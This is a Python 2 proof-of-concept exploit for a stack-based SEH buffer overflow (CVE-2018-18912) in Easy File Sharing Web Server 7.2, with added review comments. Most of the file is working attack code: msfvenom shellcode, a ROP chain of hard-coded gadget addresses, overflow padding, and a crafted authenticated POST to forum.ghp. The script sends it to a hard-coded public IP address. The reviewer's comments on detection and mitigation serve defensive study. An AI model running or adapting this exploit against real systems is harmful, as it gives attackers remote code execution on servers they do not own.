# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912
# 1. Description: An issue was discovered in Easy File Sharing (EFS) Web Server 7.2.
# A stack-based buffer overflow vulnerability occurs when an authenticated user sends
# a malicious POST request to forum.ghp upon creating a new topic in
# the forums, which allows remote attackers to execute arbitrary code.
# 2. Proof of Concept
| import socket | |
| import struct | |
# Connection target for the PoC: a hard-coded IPv4 literal and TCP port.
# NOTE(review): HOST is where the TCP connection actually goes; it differs
# from the "Host:" header value written into the request text further down
# (192.168.184.1), which is only what the server sees inside the request.
HOST = '81.82.253.190'
PORT = 81
def p32(v):
    """Return *v* packed as a 4-byte little-endian unsigned integer.

    Equivalent to ``struct.pack("<L", v)``; used below to emit each ROP
    gadget address / immediate as one 32-bit stack slot.
    """
    packer = struct.Struct("<L")
    return packer.pack(v)
def send_malformed_buffer(data):
    """Deliver *data* to HOST:PORT over a fresh TCP connection, then close it.

    Fire-and-forget: one send() call, nothing is read back, and the socket
    is closed only on the normal path (an exception from connect() or
    send() propagates with the socket still open).
    """
    endpoint = (HOST, PORT)
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(endpoint)
    client.send(data)
    client.close()
# --- Payload construction -----------------------------------------------------
# Everything from here to the end builds a single HTTP POST whose `author`
# form field carries the overflow buffer (padding, nSEH, SEH handler
# overwrite, filler, ROP chain, shellcode) and then sends it once through
# send_malformed_buffer().  No response is read.
#
# NOTE(review): this is Python 2 code.  shellcode/buff/ropchain/request are
# `str` objects holding raw bytes through \x escapes and are concatenated
# with the return value of struct.pack(); on Python 3 that value is `bytes`,
# so the `buff += struct.pack(...)` line below raises TypeError.
#
# NOTE(review), detection/mitigation: on the wire this is a POST to
# /forum.ghp?forumid=1 with an `author` value of several KB made of 'A'/'F'
# padding followed by non-printable bytes -- a straightforward WAF/IDS
# signature -- and the Cookie header shows it is sent as an authenticated
# user, matching the description in the file header.  The hard-coded gadget
# addresses imply the modules involved load at fixed bases, and the handler
# overwrite implies the process is not covered by SafeSEH/SEHOP; ASLR and
# SafeSEH/SEHOP are therefore the mitigations that would break this chain.
#
# Shellcode generated with the msfvenom command below; the -b list is the
# set of bad characters excluded from the encoded payload (it includes NUL,
# CR/LF, space and the form-encoding metacharacters '&', '=', '%', '+').
#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python
shellcode = ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"
# ---====GADGETS====---
# Gadget addresses are specific to the tested build (see the file header).
# The comment on the MOV EAX,[EAX] gadget names ImageLoad.dll for the
# 0x100xxxxx range; the module behind the 0x61cxxxxx range is not named
# anywhere in this file.  NOTE(review): pop_esi_retn and pop_ebx_retn are
# defined but never used in the chain below.
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2
ropchain = ''
# Overflow buffer layout: 64 bytes of padding up to the SEH record, 4 bytes
# for nSEH, 4 bytes for the handler (overwritten with the stack-pivot
# gadget), then 2348 bytes of filler; the ROP chain is appended at the end.
buff = 'A' * 64
buff += 'BBBB' #nseh
buff += struct.pack("<L", stack_pivot_addr) #handler
buff += 'F' * 2348
# ROP chain.  The register-setup comments follow the original author's; the
# chain ends in PUSHAD, which pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI
# as consecutive stack slots.
ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81) # undocumented in the original
ropchain += p32(0x1001d626) # undocumented in the original
ropchain += p32(0x10021a3e) # undocumented in the original
#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)
#EDX = NewProtect(0x40): clear EDX, then 64 x INC EDX (one gadget per line)
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
#ECX = lpOldProtect (ptr to a writable address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)
#EBX = dwSize(): NEG turns 0xFFFFFFFE into 2, which is then added to EBX.
# NOTE(review): EBX is not set anywhere earlier in the chain, so the result
# depends on whatever EBX holds when the chain runs.
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)
#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)
#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)
#PUSHAD; RETN
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4 # four NOP bytes ahead of the shellcode
ropchain += shellcode
buff += ropchain
# HTTP request text.  The Host: header value is independent of HOST above
# (the TCP connection goes to HOST; this is only what the server sees).
# NOTE(review): the Cookie values, including SESSIONID, are fixed literals;
# whether the server validates them is not visible from this file.
request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
# `author` is the overflow vector named in the title.  The buffer is inserted
# raw (not percent-encoded), which is presumably why the shellcode bad-char
# list above excludes the form-encoding metacharacters.
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"
# Single-shot delivery; any response is discarded.
send_malformed_buffer(request)